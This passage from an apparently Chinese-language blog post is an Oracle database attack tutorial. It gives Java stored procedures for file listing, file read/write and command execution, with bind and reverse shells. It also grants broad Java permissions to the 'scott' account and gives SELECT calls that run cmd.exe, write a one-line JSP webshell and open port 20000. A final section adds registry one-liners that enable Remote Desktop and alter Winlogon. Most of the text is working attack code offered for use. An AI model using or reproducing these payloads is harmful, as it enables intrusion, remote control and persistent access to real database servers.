try {fos.close();} catch (Exception e) {}
}
}
}
public static String readFile(String pathfile,String code){
BufferedReader br=null;
String value="";
try {
br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
String s=null;
while((s=br.readLine())!=null){
value+=s;
}
return value;
} catch (Exception e) {
return e.getMessage();
} finally{
if(br!=null){try {br.close();} catch (IOException e) {}}
}
}
public static String execFile(String filepath,String code){
int i=0;
Runtime rt=Runtime.getRuntime();
String output="";
InputStreamReader isr = null;
char[] bufferC=new char[1024];
try{
Process ps=rt.exec(filepath);
isr=new InputStreamReader(ps.getInputStream(),code);
while((i=isr.read(bufferC,0,bufferC.length))!=-1){
output+=new String(bufferC,0,i);
}
return output;
}catch(Exception e){
return e.getMessage();
}finally{
if(isr!=null)try {isr.close();} catch (IOException e) {}
}
}
public static String bindShell(int port){
ServerSocket ss=null;
Socket s=null;
try {
ss = new ServerSocket(port);
s=ss.accept();
new optShell(ss,s).start();

return "OK";
} catch (Exception e) {
return e.getMessage();
}
}
public static String reverseShell(String host,int port){
Socket s=null;
try{
s=new Socket(host,port);
new optShell(null,s).start();
return "OK";
}catch(Exception e){
return e.getMessage();
}
} //反弹shell的sqlj语句
public static class optShell extends Thread{
OutputStream os=null;
InputStream is=null;
ServerSocket ss;
Socket s;
public optShell(ServerSocket ss,Socket s){
this.ss=ss;
this.s=s;
try{
this.is=s.getInputStream();
this.os=s.getOutputStream();
}catch(Exception e){
if(os!=null)try {os.close();} catch(Exception ex) {}
if(is!=null)try {is.close();} catch(Exception ex) {}
if(s!=null)try {s.close();} catch(Exception ex) {}
if(ss!=null)try {ss.close();} catch(Exception ex) {}
}
}
public void run(){
BufferedReader br=new BufferedReader(new InputStreamReader(is));
String line="";
String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n";
try {
//os.write(cmdhelp.getBytes());
line=br.readLine();
while(!"exit".equals(line)){
if(line.length()>3){
StringBuffer sb=new StringBuffer(line.trim());
String cmd=sb.substring(0, 4);
if(cmd.equals("list")){
os.write("input you path:\r\n".getBytes());
line=br.readLine();
os.write(listFolder(line).getBytes());
}else if("save".equals(cmd)){
os.write("input you filepath:\r\n".getBytes());
line=br.readLine();
os.write("input you value:\r\n".getBytes());
os.write(saveFile(line,br.readLine()).getBytes());
}else if("read".equals(cmd)){
os.write("input you filepath:\r\n".getBytes());
line=br.readLine();
os.write("input you code examle:GBK\r\n".getBytes());
os.write(readFile(line,br.readLine()).getBytes());
}else if("exec".equals(cmd)){
os.write("input you run filepath:\r\n".getBytes());
line=br.readLine();
os.write("input you code examle:GBK\r\n".getBytes());
os.write(execFile(line,br.readLine()).getBytes());
}else{
os.write(cmdhelp.getBytes());
}
}else{
os.write(cmdhelp.getBytes());
}
line=br.readLine();
}
} catch (Exception e) {
e.printStackTrace();
}finally{
if(os!=null)try {os.close();} catch(Exception e) {}
if(is!=null)try {is.close();} catch(Exception e) {}
if(s!=null)try {s.close();} catch(Exception e) {}
if(ss!=null)try {ss.close();} catch(Exception e) {}
}
}
}
}
/
create or replace function BOB_LISTFOLDER(str varchar2) return varchar2
as language java name 'BOB.listFolder(java.lang.String) return java.lang.String';
/
create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2
as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String';
/
create or replace function BOB_READFILE(p varchar2,c varchar2) return varchar2
as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String';
/
create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2
as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String';
/
create or replace function BOB_BINDSHELL(port number) return varchar2
as language java name 'BOB.bindShell(int) return java.lang.String';
/
begin
Dbms_Java.Grant_Permission('scott','java.io.FilePermission','<<ALL FILES>>','read,write,execute,delete');
Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor');
Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve');
end;

这么一大段,仔细看
执行完后

Select BOB_LISTFOLDER(‘/usr’) FROM DUAL //列目录
Select BOB_EXECFILE(‘C:\WINDOWS\system32\cmd.exe /c dir c:\’,'GBK’) FROM DUAL; //执行命令
Select BOB_READFILE(‘/tmp/1.txt’,'GBK’) FROM DUAL; //读文件
Select BOB_SAVEFILE(‘/tmp/1.jsp’,'<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>’) FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG
Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去

其中本来还有reserver shell的
我还没来的及测试
我自己是更中意反弹shell的
特别是linux
好操作的多
再说有时候linux是nat出来的
反弹就去了许多麻烦

第四部分 技巧

一句话读取3389端口

exec  :=run_cmz('REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber');

一句话开3389 只合适win 2k3

exec  :=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f');

删除pcanywhere导致的终端登陆错误

exec  :=run_cmz('reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f');

• 暂无相关日志